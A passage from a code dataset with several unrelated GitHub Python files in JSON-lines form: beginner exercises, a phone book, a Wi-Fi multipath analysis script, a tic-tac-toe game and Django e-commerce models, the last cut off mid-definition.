-1\n\nwhile True:\n print (\"Infinite\")\n break\n\nfor i in range (1,11): # Omitting some values\n if i == 5:\n continue\n print(i)\n\n# Functions\n\n\ndef function2():\n print(\"Tis is our first function!\")\n\nfunction2()\n\n\ndef returning():\n return \"I am a result!\"\n\nresult = returning()\nprint(result)\n\n\ndef multival():\n return \"This is a return value\", 2\n\nprint (multival())\n\n\ndef parameters(a):\n print (a)\nparameters(a=\"This is a parameter\")\n\n\ndef add(y,w):\n c = y + w\n return c\n\nresult = add(12,5)\nprint (result)\n\nresultString = add(\"One\", \"String\")\n\nprint(resultString)\n\n\ndef default_param(a,b=4,c=5):\n return a + b + c\nresult3 = default_param(3)\nprint (result3)\n\n# Scope\n\n\ndef scope(z):\n z = z + 1\n print (z)\n return z\nscope(5)\n\n\ndef outer(a):\n\n def nested(b):\n return b * a;\n a = nested(a)\n return a\nprint (outer(4))\n\n\ndef f(a):\n def g(b):\n def h(c):\n return a * b * c\n return h\n return g\nprint (f(5)(2)(3))\n\n# Recursive functions which use themselves over and over again\n\n\ndef factorial(n): # Factorial to Silnia\n if n == 1:\n return 1\n else:\n return n * factorial(n - 1) # 5 * 4 * 3 * 2 * 1\nprint(factorial(5))\n\n\ndef sums(n):\n if n == 1:\n return 1\n else:\n return n + sums(n - 1)\n\n\ndef tail_sum(n, accumulator=0):\n if n == 0:\n return accumulator\n else:\n return tail_sum(n - 1, accumulator+n)\n\nprint (sums(10))\nprint(tail_sum(10))\n\n# Lambda functions\n\n\nf = lambda x, y: x + y\n\nprint(f(2,3))\n\n\nj = lambda a: lambda b: lambda c: a * b * c\n\nprint(j(3)(2)(4))\n\nk = lambda c: lambda w, x: lambda d: (c * (w + x)) % d\n\nprint (k(2)(4, 3)(11))\n\n# Exception handling\n\ntry:\n a = 5/0\nexcept Exception as e:\n print (e)\n\ntry:\n n = int(input(\"Enter an integer: \"))\nexcept ValueError:\n print(\"That is not an integer!\")\n\ntry:\n sumsy = 0\n file = open('numbers.txt', 'r')\n for number in file:\n sumsy = sumsy + 1.0/int(number)\n print(sumsy)\nexcept ZeroDivisionError:\n print (\"Number is divided by zero!\")\nexcept IOError:\n print (\"File DNE\")\n\n# Throwing exceptions\n\na = 'a'\n\n\ndef raiseexception(a):\n if type(a) != type('a'):\n raise ValueError(\"This is not string\")\n\ntry:\n raiseexception(a)\nexcept ValueError as e:\n print(e)\n\n\ndef testcase(a, b):\n assert a < b, \"a is greater than b\"\ntry:\n testcase(2,1)\nexcept AssertionError as e:\n print(e)\n\n# Data input\n\nage = input (\"How old are you?\")\nprint (age)\n\n# File Management open (filename, access(read or write), buffering)\n\nfile = open(\"C:\\\\Users\\\\mkucm\\\\Desktop\\\\lol.txt\", \"r\")\nprint (file.read(4)) # Reads 4 characters from the file\n# print (file.tell()) # Cursor is at the fourth position\nprint (file.seek(6)) # Moves the cursor to the defined position\nprint(file.tell())\nfile.close()\n\n\nfile = open(\"C:\\\\Users\\\\mkucm\\\\Desktop\\\\lol.txt\", \"r\")\nfor line in file:\n print(line) # Writes every line\n\nfile.close()\n\nfile = open(\"C:\\\\Users\\\\mkucm\\\\Desktop\\\\lol.txt\", \"r\")\nprint (\"File Name: \" + file.name)\nprint(\"is closed: \" + str(file.closed))\nprint(\"Mode \" + file.mode)\n\n# Writing to a file w+ = writing and reading\n\n\nfile = open(\"write.txt\", \"w+\")\nfile.write(\"Hello file, I am string!\")\nfile.seek(0)\nfile.write(\"this\") # overwrites the length of this string from the position of seek function\nprint(file.read())\nfile.close()\n\n\n# Data Structure\n\n\ntuple = (1, \"abc\", 2, \"cde\")\ntuple1 = 3, \"efg\", True\ntuple2 = \"A\" # tuple2 = (\"A\",)\nprint(tuple)","repo_name":"GentelmanBastard/PythonCourse","sub_path":"pierwszy/pierwszy.py","file_name":"pierwszy.py","file_ext":"py","file_size_in_byte":5047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10037722170","text":"\nimport argparse\nimport os\nimport pickle\nimport numpy as np\nimport math as mt\nimport scipy.io as sio\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('step_aoa_first', help='Step for the AoA of first path', type=int)\n parser.add_argument('step_aoa_second', help='Step for the AoA of second path', type=int)\n parser.add_argument('max_num_paths', help='Maximum number of paths detected', type=int)\n parser.add_argument('opt_method', help='Optimization routine')\n parser.add_argument('exp_dir', help='Name base of the directory')\n parser.add_argument('name_base', help='Name base of the simulation ToA')\n args = parser.parse_args()\n\n exp_dir = args.exp_dir\n name_base = args.name_base # simulation\n print(name_base)\n\n step_aoa_first = args.step_aoa_first\n aoa_fist_array = np.arange(-90, 90, step_aoa_first)\n num_aoa_first = aoa_fist_array.shape[0]\n\n path_find = np.zeros((180, args.max_num_paths + 1))\n # in the last column we have the number of times all the paths are identified\n estim_toa_error = np.zeros((180, args.max_num_paths))\n estim_aoa_error = np.zeros((180, args.max_num_paths))\n counter = np.zeros((180, 1)) # to then average the results\n execution_times = np.zeros((180, 1))\n\n toa_sep_threshold_first = 5e-9\n toa_sep_threshold = 5e-9\n aoa_sep_threshold = 40\n\n for aoa_second in range(-90, 91, args.step_aoa_second):\n\n name_file = exp_dir + 'CFR_' + name_base + '_aoaobst_' + str(aoa_second) + '.mat'\n csi_buff = sio.loadmat(name_file)\n signal_complete = (csi_buff['CFR'])\n\n name_file = exp_dir + 'delay_' + name_base + '_aoaobst_' + str(aoa_second) + '.mat'\n csi_buff = sio.loadmat(name_file)\n delays_sim = (csi_buff['propagation_delays'])\n\n name_file = exp_dir + 'aoa_' + name_base + '_aoaobst_' + str(aoa_second) + '.mat'\n csi_buff = sio.loadmat(name_file)\n aoa_sim = (csi_buff['propagation_aoa'])\n\n name_file = exp_dir + 'path_loss_' + name_base + '_aoaobst_' + str(aoa_second) + '.mat'\n try:\n csi_buff = sio.loadmat(name_file)\n path_loss_sim = (csi_buff['propagation_path_loss'])\n except FileNotFoundError:\n path_loss_sim = None\n\n # open results optimization\n save_dir = '../results/' + args.opt_method + '/'\n name_file = save_dir + 'paths_amplitude_list_' + name_base + '_aoaobst_' + str(aoa_second) + '.txt'\n try:\n with open(name_file, \"rb\") as fp: # Pickling\n paths_amplitude_list = pickle.load(fp)\n name_file = save_dir + 'paths_aoa_list_' + name_base + '_aoaobst_' + str(aoa_second) + '.txt'\n with open(name_file, \"rb\") as fp: # Pickling\n paths_aoa_list = pickle.load(fp)\n name_file = save_dir + 'paths_toa_list_' + name_base + '_aoaobst_' + str(aoa_second) + '.txt'\n with open(name_file, \"rb\") as fp: # Pickling\n paths_toa_list = pickle.load(fp)\n except FileNotFoundError:\n print('file not found', name_file)\n continue\n try:\n name_file = save_dir + 'opr_sim_' + name_base + '_aoaobst_' + str(aoa_second) + '.npz'\n save_dct = np.load(name_file, allow_pickle=True)\n execution_time = save_dct['opt_times']\n except FileNotFoundError:\n try:\n name_file = save_dir + 'opr_sim_' + name_base + '_aoaobst_' + str(aoa_second) + '.txt'\n with open(name_file, \"rb\") as fp:\n execution_time = pickle.load(fp)\n except FileNotFoundError:\n execution_time = np.nan*np.ones(len(paths_toa_list))\n\n # parameters\n n_tot = 4\n F_frequency = 256\n delta_f = 312.5E3\n delete_idxs = np.asarray([0, 1, 2, 3, 4, 5, 25, 53, 89, 117, 127, 128, 129, 139, 167, 203, 231, 251, 252, 253,\n 254, 255], dtype=int)\n frequency_vector_idx = np.arange(F_frequency)\n frequency_vector_complete = delta_f * (frequency_vector_idx - F_frequency / 2)\n frequency_vector_idx = np.delete(frequency_vector_idx, delete_idxs, axis=0)\n frequency_vector = np.delete(frequency_vector_complete, delete_idxs, axis=0)\n T = 1 / delta_f\n\n for aoa_idx_first in range(num_aoa_first):\n aoa_first = aoa_fist_array[aoa_idx_first]\n\n # RESULTS OF OPTIMIZATION\n paths_refined_amplitude_array = paths_amplitude_list[aoa_idx_first]\n paths_refined_aoa_array = paths_aoa_list[aoa_idx_first]\n if args.opt_method == 'iht' or args.opt_method == 'omp':\n paths_refined_aoa_array = -paths_refined_aoa_array\n paths_refined_toa_array = paths_toa_list[aoa_idx_first]\n\n if paths_refined_amplitude_array.shape[0] > 0:\n delete_idxs = np.argwhere(np.abs(paths_refined_amplitude_array) <\n np.max(np.abs(paths_refined_amplitude_array))/5)\n if delete_idxs.shape[0] > 0:\n paths_refined_amplitude_array = np.delete(paths_refined_amplitude_array, delete_idxs[:, 0])\n paths_refined_aoa_array = np.delete(paths_refined_aoa_array, delete_idxs[:, 0])\n paths_refined_toa_array = np.delete(paths_refined_toa_array, delete_idxs[:, 0])\n sorted_idx = np.argsort(np.abs(paths_refined_toa_array))\n\n paths_refined_amplitude_array_sorted = paths_refined_amplitude_array[sorted_idx]\n paths_refined_aoa_array_sorted = paths_refined_aoa_array[sorted_idx]\n paths_refined_toa_array_sorted = paths_refined_toa_array[sorted_idx]\n\n # GROUND TRUTH SIMULATION\n if path_loss_sim is not None:\n sorted_idx_sim = np.argsort(abs(path_loss_sim[0, aoa_idx_first]))[0, :]\n else:\n sorted_idx_sim = np.arange(2)\n\n azimuth_sorted_sim = (aoa_sim[0, aoa_idx_first][0, sorted_idx_sim])\n if aoa_sim.shape[0] > 1:\n elevation_sorted_sim = (aoa_sim[0, aoa_idx_first][1, sorted_idx_sim])\n azimuth_sorted_sim_2 = np.arcsin(np.sin(azimuth_sorted_sim / 180 * mt.pi)\n * np.cos(elevation_sorted_sim / 180 * mt.pi)) * 180 / mt.pi\n else:\n azimuth_sorted_sim_2 = np.copy(np.asarray(-180+azimuth_sorted_sim, dtype='int16'))\n\n az_positive = azimuth_sorted_sim_2 > 0\n az_negative = azimuth_sorted_sim_2 < 0\n azimuth_sorted_sim_2[az_positive] -= 180\n azimuth_sorted_sim_2[az_negative] += 180\n\n swap_idx_pos = azimuth_sorted_sim_2 > 90\n swap_idx_neg = azimuth_sorted_sim_2 < -90\n azimuth_sorted_sim_2[swap_idx_pos] = 180 - azimuth_sorted_sim_2[swap_idx_pos]\n azimuth_sorted_sim_2[swap_idx_neg] = - 180 - azimuth_sorted_sim_2[swap_idx_neg]\n\n times_sorted_sim = delays_sim[0, aoa_idx_first][:, sorted_idx_sim]\n # times_sorted_sim = times_sorted_sim - times_sorted_sim[0, 0]\n if path_loss_sim is not None:\n path_loss_sorted_sim = path_loss_sim[0, aoa_idx_first][:, sorted_idx_sim]\n else:\n path_loss_sorted_sim = None\n\n aoa_first_true = int(np.round(azimuth_sorted_sim_2[0], 1))\n aoa_second_true = int(np.round(azimuth_sorted_sim_2[1]))\n diff_aoa_first_second = mt.floor(aoa_first_true - azimuth_sorted_sim_2[1])\n aoa_idx_diff = diff_aoa_first_second\n if aoa_first_true * aoa_second_true > 0:\n pass\n elif aoa_first_true >= 0: # and consequently aoa_second < 0\n if diff_aoa_first_second >= 90:\n aoa_idx_diff = - (90 - aoa_first_true + 90 + aoa_second_true)\n else: # consequently aoa_first < 0 and aoa_second > 0\n if diff_aoa_first_second < - 90:\n aoa_idx_diff = 90 - aoa_second_true + 90 + aoa_first_true\n\n # print(aoa_idx_diff)\n aoa_idx_diff += 90\n\n # Check if paths have been separated and if yes the error of the identification\n paths_found = 0\n for path_idx in range(times_sorted_sim.shape[1]):\n toa_diff = abs(paths_refined_toa_array_sorted - times_sorted_sim[0, path_idx])\n aoa_diff = abs(paths_refined_aoa_array_sorted - azimuth_sorted_sim_2[path_idx])\n aoa_diff = np.minimum(aoa_diff, 180-aoa_diff)\n\n if path_idx > 0:\n toa_below_threshold = set(np.argwhere(toa_diff < toa_sep_threshold)[:, 0])\n aoa_below_threshold = set(np.argwhere(aoa_diff < aoa_sep_threshold)[:, 0])\n else:\n toa_below_threshold = set(np.argwhere(toa_diff < toa_sep_threshold_first)[:, 0])\n aoa_below_threshold = set(np.argwhere(aoa_diff < aoa_sep_threshold)[:, 0])\n path_set_estim = toa_below_threshold.intersection(aoa_below_threshold)\n path_set_estim = list(path_set_estim)\n\n if path_set_estim:\n paths_found += 1\n path_idx_estim = min(path_set_estim) # select the strongest path among the compatible ones\n estim_toa_error[aoa_idx_diff, path_idx] += toa_diff[path_idx_estim]\n estim_aoa_error[aoa_idx_diff, path_idx] += aoa_diff[path_idx_estim]\n\n paths_refined_toa_array_sorted = paths_refined_toa_array_sorted - paths_refined_toa_array_sorted[path_idx_estim]\n times_sorted_sim = times_sorted_sim - times_sorted_sim[0, path_idx]\n\n paths_refined_toa_array_sorted = np.delete(paths_refined_toa_array_sorted, path_idx_estim)\n paths_refined_aoa_array_sorted = np.delete(paths_refined_aoa_array_sorted, path_idx_estim)\n path_find[aoa_idx_diff, path_idx] += 1\n if paths_found == times_sorted_sim.shape[1]:\n path_find[aoa_idx_diff, path_idx + 1] += 1\n counter[aoa_idx_diff] += 1\n\n execution_times[aoa_idx_diff] += execution_time[aoa_idx_first]\n\n print(counter[:, 0])\n path_find_avg = np.divide(path_find, counter)\n execution_times_avg = np.divide(execution_times, counter)\n estim_toa_error_avg = np.divide(estim_toa_error, path_find[:, :-1])\n estim_aoa_error_avg = np.divide(estim_aoa_error, path_find[:, :-1])\n\n save_dir = '../results/processed_' + args.opt_method + '/'\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n\n name_file = save_dir + 'path_find_avg_' + name_base + '.txt'\n with open(name_file, \"wb\") as fp: # Pickling\n pickle.dump(path_find_avg, fp)\n name_file = save_dir + 'computing_time_avg_' + name_base + '.txt'\n with open(name_file, \"wb\") as fp: # Pickling\n pickle.dump(execution_times_avg, fp)\n\n name_file = save_dir + 'estim_toa_error_avg_' + name_base + '.txt'\n with open(name_file, \"wb\") as fp: # Pickling\n pickle.dump(estim_toa_error_avg, fp)\n name_file = save_dir + 'estim_aoa_error_avg_' + name_base + '.txt'\n with open(name_file, \"wb\") as fp: # Pickling\n pickle.dump(estim_aoa_error_avg, fp)\n","repo_name":"francescamen/Wi-Fi-multipath-parameter-estimation","sub_path":"Python_code/analysis_from_python_methods.py","file_name":"analysis_from_python_methods.py","file_ext":"py","file_size_in_byte":11342,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"38814083345","text":"import sys\n\"\"\"Phone book program\"\"\"\n\n\"\"\"varebiles\"\"\"\nforce_input = ['force_quit', 'fq', 'force_back', 'fb']\nmain_menu_options = ['Q', '1', '2', '3', '4']\ny_n_option = ['y', 'n']\nsearch_menu_options = ['1', '2', '3', 'Q', 'B']\n\"\"\" dictionary \"book\" is an temporary solution, will be replaced by save/read file feature\"\"\"\nbook = {\n 0: {'First Name': '_', 'Second Name': '_', 'Age': '_', 'Phone Number': '_', 'City': '_', 'Postal Code': '_',\n 'Street': '_'},\n 1: {'First Name': 'Adam', 'Second Name': 'ASDF', 'Age': '35', 'Phone Number': '_',\n 'City': '_', 'Postal Code': '_',\n 'Street': '_'},\n 2: {'First Name': 'Aleksandra', 'Second Name': 'QWE', 'Age': '31', 'Phone Number': '_',\n 'City': '_', 'Postal Code': '_',\n 'Street': '_'},\n 3: {'First Name': 'Sebastian', 'Second Name': 'Sza', 'Age': '31', 'Phone Number': '_',\n 'City': '_', 'Postal Code': '_',\n 'Street': '_'},\n 4: {'First Name': 'Adam', 'Second Name': 'Sza', 'Age': '51', 'Phone Number': '_',\n 'City': '_', 'Postal Code': '_', 'Street': '_'},\n }\n\n\"\"\"Functions\"\"\"\n\n#under construct - option to skip adding values\n# def force(user_input=\"\"):\n# if user_input in force():\n# if user_input == 'force_quit':\n# print(\"Bye!\")\n# sys.exit()\n# elif user_input == 'fq':\n# print(\"Bye!\")\n# sys.exit()\n# elif user_input == 'force_back':\n# print(\"going back to main menu\")\n# elif user_input == 'fb':\n# print(\"going back to main menu\")\n\n\ndef delete_entry():\n \"\"\"module stand for deleting entry from book dict, basis on user input ID\n from book, include confirmation protect and wrong input protect\"\"\"\n d_id = int(input(\"Provide ID to delete:\\n\"))\n if d_id in book:\n d_conf = input(f\"Do you really wanna delete:\\n {book[d_id]}?\\n (y/n):\\n\").lower()\n if d_conf in y_n_option:\n if d_conf == 'y':\n del book[d_id]\n print(f\"{d_id} successfully deleted!\")\n else:\n main_menu()\n else:\n wrong_input()\n else:\n print(f\"there is no entry with id {d_id}\")\n wrong_input()\n\n\ndef search():\n \"\"\"Search module, looks for value in every nested dictionary, returns value of parent dictionary,\n allow program to print full data of entry\"\"\"\n search_result = [] #storage of \"parent dictionaries\"\n search_data = input(\"Provide data to find: \\n\")\n for i in book:\n for k in book[i].items():\n if k[1] == search_data:\n search_result.append(i)\n\n for i in search_result:\n print(book[i])\n\n\ndef search_menu():\n \"\"\"choose action menu, description according to input string 1 - print whole dictionary, 2 len of dictionary,\n 3 data search, Q - quit, B - back to main menu\"\"\"\n search_menu_input = input(\"Choose action:\\n\"\n \"1 - show whole list\\n2 - len of list\\n3 - search data \\n\"\n \"Q - quit\\nB - Back to main menu\\n\\nYour choice:\\n\").upper()\n if search_menu_input in search_menu_options:\n if search_menu_input == 'Q':\n print('sys exit search menu')\n sys.exit()\n elif search_menu_input == 'B':\n print(\"Going back to main menu\")\n main_menu()\n elif search_menu_input == '1':\n for book_id, book_info in book.items():\n print(\"\\nBook ID:\", book_id)\n for key in book_info:\n print(key + \":\", book_info[key])\n print(\"\\n\\n\")\n search_menu()\n elif search_menu_input == '2':\n print(f\"Your phone book list have {len(book)} entry(ies)\\n\")\n search_menu()\n elif search_menu_input == '3':\n search()\n search_menu()\n else:\n wrong_input()\n\n\ndef wrong_input():\n \"\"\"module which stand for 'wrong input' message for user\"\"\"\n print(\"Invalid input provided, do you want continue(y/n): \\n\")\n user_input = input().lower()\n if user_input in y_n_option:\n if user_input == 'y':\n main_menu()\n else:\n print(\"Bye!\")\n sys.exit()\n else:\n wrong_input()\n\n\ndef print_book():\n \"\"\"module stands for printing address book line by line\"\"\"\n for line in book:\n print(line, book[line])\n\n\ndef entry():\n \"\"\"\n Function \"ENTRY\" responsible for add single entry to \"book\" dictionary which is currently my \"database\"\n Variable first_name/second_name/phone_number/etc are responsible exactly same as named.\n \"\"\"\n\n first_name = input(\"Provide first name: \\n\")\n# force(first_name)\n second_name = input(\"Provide second name: \\n\")\n# force(second_name)\n age = input(\"Provide Age: \\n\")\n# force(age)\n phone_number = input(\"Provide phone number: \\n\")\n# force(phone_number)\n city = input(\"Provide city: \\n\")\n# force(city)\n postal_code = input(\"Provide postal code: \\n\")\n# force(postal_code)\n street = input(\"Provide street: \\n\")\n# force(street)\n\n if first_name == second_name == phone_number == age == city == postal_code == street == \"\":\n # check if user provide 7 times nothing, if yes just pass\n print(\"No entry data provided\")\n pass\n elif first_name in book and second_name in book and age in book and phone_number in book and city in book \\\n and postal_code in book and street in book:\n print(\"Mentioned user already exist\")\n user_already_exist = input(\"Do you want continue(y/n): \\n\").lower()\n if user_already_exist == 'y':\n entry()\n else:\n pass\n\n else:\n book[len(book)] = {'First Name': first_name, 'Second Name': second_name, 'Age': age,\n 'Phone Number': phone_number, 'City': city, 'Postal Code': postal_code,\n 'Street': street}\n\n\ndef main_menu():\n \"\"\"Main menu\"\"\"\n user_first_input = input(\"Q - Quit\\n1 - search menu\\n2 - append menu\\n3 - \"\n \"delete menu\\n YOUR CHOICE (Q/1/2/3):\\n\").upper()\n if user_first_input not in main_menu_options:\n wrong_input()\n\n elif user_first_input == 'Q':\n print(\"sys exit in main_menu=>user_first_input = Q\")\n sys.exit()\n elif user_first_input == '1':\n search_menu()\n elif user_first_input == '2':\n entry()\n print_book()\n main_menu()\n elif user_first_input == '3':\n delete_entry()\n main_menu()\n else:\n main_menu()\n\n\n\"\"\"Executive part\"\"\"\nmain_menu()\n","repo_name":"Sewi1808/ISA_KursPython3KRK","sub_path":"day_6/homework/Homework_nested_dictionary_attempt.py","file_name":"Homework_nested_dictionary_attempt.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38696844979","text":"from time import time\nfrom Iterables import Iterables\n\nclass Block(Iterables):\n \"\"\"\n This class manages the blocks in the blockchain.\n \n Attributes:\n previous_hash: Hash of the previous block.\n index: Index of the block.\n transactions: Transactions in a block.\n proof: Proof number of the block.\n timestamp: Timestamp of the block.\n \"\"\"\n def __init__(self, previous_hash, index, transactions, proof, timestamp=time()):\n \"\"\"\n This function initialise a Block in blockchain.\n\n Attributes:\n previous_hash: Hash of the previous block.\n index: Index of the block.\n transactions: Transactions in a block.\n proof: Proof number of the block.\n timestamp: Timestamp of the block.\n \"\"\"\n self.previous_hash = previous_hash\n self.index = index\n self.transactions = transactions\n self.proof = proof\n self.timestamp = timestamp","repo_name":"zaidK1007/Blockchain","sub_path":"Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"12779442799","text":"import datetime\n# print(datetime.datetime.now())\n# 2021-12-15 15:12:18.023355\nn = 5\nnumbers = [8,3,7,9,2,11,45,111,45,88,1,125,61,888,25,99]\nm = 3\ntargets = [5,7,9,88,89,887]\nres = []\nnumbers.sort()\nprint(numbers)\nfor target in targets:\n check = 'no'\n first = 0\n last = len(numbers) - 1\n # print('target',target)\n while first <= last:\n mid = (first+last)//2\n # print('mid',mid)\n if target == numbers[mid]:\n check = 'yes'\n break\n elif target < numbers[mid]:\n last = mid-1\n else:\n first = mid+1\n\n res.append(check)\n\nprint(res)\n# print(datetime.datetime.now())\n# 2021-12-15 15:22:53.256103","repo_name":"ggaem97/study","sub_path":"2021-12-15/binarySearch_.py","file_name":"binarySearch_.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39752048506","text":"from PyQt4.QtCore import *\n\n# to bring new PyQt functionality - make wrapper\nclass QDateTimeM(QDateTime):\n def __init__(self, parent=None):\n super(QDateTimeM, self).__init__(QDateTime().currentDateTime())\n\n def toMSecsSinceEpoch(self):\n\t time = self.time()\n\t return int((float(self.toTime_t())+float(time.msec())/1000)*1000)\n \n\nif __name__=='__main__':\n\tqdt = QDateTimeM()\n\tprint(qdt.toMSecsSinceEpoch())\n","repo_name":"DESY-Petra-III/P02","sub_path":"P02.2/_stage/resistive_heating/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13792375851","text":"from board import *\nimport os\nprint(\"Welcome to your doom\")\n\ndef clear():\n os.system('clear')\n\ninputFine = False\nwhile not inputFine:\n hCh = input(\"Choose your poison (X/O)\")\n if hCh in ['x', 'X', 'o', 'O']:\n inputFine = True\n else:\n print(\"abbey 2 year old READ\")\nboard_obj = Board(hCh)\n\ninputFine = False\n\nwhile not inputFine:\n stFirst = input(\"Would you like to start first?\")\n if stFirst in ['y', 'Y', 'n', 'N']:\n inputFine = True\n else:\n print(\"abbey 2 year old READ\")\naiGo = False\nif stFirst in ['n', 'N']:\n aiGo = True\n\ngameOver = False\ntotMoves = 0\nchkRet = 0\nwhile not gameOver and totMoves < 10:\n if aiGo:\n board_obj.aiTurn()\n totMoves += 1 \n aiGo = False\n clear()\n board_obj.show()\n humanDumb = True\n\n while humanDumb:\n try:\n inp = int(input(\"please give input: \"))\n except (EOFError, KeyboardInterrupt):\n print('Bye')\n exit()\n except (KeyError, ValueError):\n print('Bad choice')\n continue\n ret = board_obj.humanInput(inp)\n \n if ret == 1:\n humanDumb = False\n totMoves += 1 \n else: \n print(\"you absolute numbskull!, try again\")\n print(\"hihi\")\n\n chkRet = board_obj.checkWin()\n if chkRet > 0:\n break\n board_obj.aiTurn() \n totMoves += 1 \n\n chkRet = board_obj.checkWin()\n if chkRet > 0:\n break\nclear()\nboard_obj.show()\nif chkRet == 0:\n print(\"tie\")\nelif chkRet == AI:\n print(\"AI\")\nelse:\n print(\"HUMAN\")\n","repo_name":"saru-d2/tictactoe-minimax","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10436345194","text":"import datetime\nimport os\nfrom django.utils.text import slugify\nfrom django.contrib.auth.models import User\nfrom django.db import models\n# Create your models here.\n\nfrom django.db.models import Avg\n\n\ndef get_client_rating(client_id):\n rating = Rating.objects.filter(client_id=client_id).aggregate(\n Avg('rating'))['rating__avg']\n return rating\n\n\ndef get_file_path(request, filename):\n original_filename = filename\n nowTime = datetime.datetime.now().strftime('%Y%m%d%H:%M:%S')\n filename = \"%s%s\" % (nowTime, original_filename)\n return os.path.join('uploads/', filename)\n\n\nclass Category(models.Model):\n name = models.CharField(\n max_length=150,\n db_index=True,\n verbose_name='Имя категории'\n )\n slug = models.SlugField(\n max_length=150,\n unique=True,\n verbose_name='Слаг')\n image = models.ImageField(\n upload_to=get_file_path,\n null=True,\n blank=True,\n verbose_name='Изображение Категории')\n description = models.TextField(\n max_length=500,\n null=False,\n blank=False,\n verbose_name='Описание Категории ')\n status = models.BooleanField(\n default=False,\n verbose_name='Статус Категории ')\n trending = models.BooleanField(\n default=False,\n verbose_name='В тренде')\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n if not self.slug:\n self.slug = slugify(self.title)\n super().save(*args, **kwargs)\n\nclass Product(models.Model):\n category = models.ForeignKey(\n Category,\n on_delete=models.CASCADE,\n verbose_name='Категория')\n name = models.CharField(\n max_length=150,\n null=False,\n blank=False,\n verbose_name='Имя товара')\n slug = models.SlugField(\n max_length=150,\n db_index=True,\n verbose_name='Слаг')\n sender_name = models.CharField(\n max_length=150,\n null=False,\n blank=False,\n verbose_name='Отправитель товара')\n product_image = models.ImageField(\n upload_to=get_file_path,\n null=True,\n blank=True,\n verbose_name='Изображение продукта')\n description = models.TextField(\n max_length=500,\n null=False,\n blank=False,\n verbose_name='Описание')\n first_price = models.FloatField(\n null=False,\n blank=False,\n verbose_name='За сколько вы купили?')\n selling_price = models.FloatField(\n null=False, blank=False, verbose_name='Цена продажи')\n status = models.BooleanField(\n default=False,\n verbose_name='Статус')\n trending = models.BooleanField(\n default=False,\n verbose_name='В тренде')\n tag = models.CharField(\n max_length=150,\n null=False,\n blank=False,\n verbose_name='Тег')\n created_at = models.DateTimeField(\n auto_now_add=True,\n verbose_name='Дата добавление')\n\n class Meta:\n verbose_name = 'Продукты'\n verbose_name_plural = 'Продукты'\n index_together = (('id', 'slug'),)\n\n def __str__(self):\n return self.name\n\n\nclass Size(models.Model):\n product = models.ForeignKey(to=Product, on_delete=models.CASCADE, verbose_name='Имя товара')\n size = models.PositiveIntegerField(verbose_name='Размер товара')\n quantity = models.PositiveIntegerField(verbose_name='Штук товара')\n\n class Meta:\n verbose_name = 'Размер'\n verbose_name_plural = 'Размеры'\n\n\nclass Cart(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='Пользователь')\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n verbose_name='Товар')\n quantity = models.PositiveIntegerField(default=1)\n size = models.PositiveIntegerField()\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n\nclass Wishlist(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='Пользователь')\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n verbose_name='Товар')\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n\nclass Order(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='Пользователь')\n orderstatuses = (\n ('В ожидании', 'В ожидании'),\n ('Для доставки', 'Для доставки'),\n ('Заказ отправлен', 'Заказ отправлен'),\n )\n status = models.CharField(\n default='В ожидании',\n max_length=150,\n choices=orderstatuses,\n verbose_name='Статус')\n fname = models.CharField(max_length=150, null=False, verbose_name='Имя')\n # lname = models.CharField(\n # max_length=150,\n # null=False,\n # verbose_name='Фамилия')\n # email = models.CharField(\n # max_length=150,\n # null=False,\n # verbose_name='Электронная почта')\n phone = models.CharField(\n max_length=150,\n null=False,\n verbose_name='Телефон номер')\n address = models.TextField(\n max_length=150,\n null=False,\n verbose_name='Адрес')\n # city = models.CharField(max_length=150, null=False, verbose_name='Город')\n # state = models.CharField(\n # max_length=150,\n # null=False,\n # verbose_name='Область')\n # country = models.CharField(\n # max_length=150,\n # null=False,\n # verbose_name='Страна')\n total_price = models.FloatField(null=False, verbose_name='Итоговая цена')\n payment_method = models.CharField(\n max_length=200, verbose_name='Способ доставки')\n tracking_no = models.CharField(\n null=True,\n max_length=150,\n verbose_name='Номер отслеживания')\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n updated_at = models.DateTimeField(auto_now=True, verbose_name='Время')\n\n class Meta:\n verbose_name = 'Заказ'\n verbose_name_plural = 'Заказы'\n\n def __str__(self):\n return '{} - {}'.format(self.id, self.tracking_no)\n\n\nclass OrderItem(models.Model):\n order = models.ForeignKey(\n Order,\n on_delete=models.CASCADE,\n verbose_name='Заказ')\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n verbose_name='Товар')\n price = models.FloatField(null=False, verbose_name='Цена')\n quantity = models.PositiveIntegerField(\n null=False, verbose_name='Количество')\n size = models.CharField(\n max_length=150,\n null=False,\n blank=False,\n verbose_name='Размер товара')\n created_at = models.DateTimeField(\n verbose_name='Дата',\n auto_now=True,\n auto_now_add=False)\n\n def 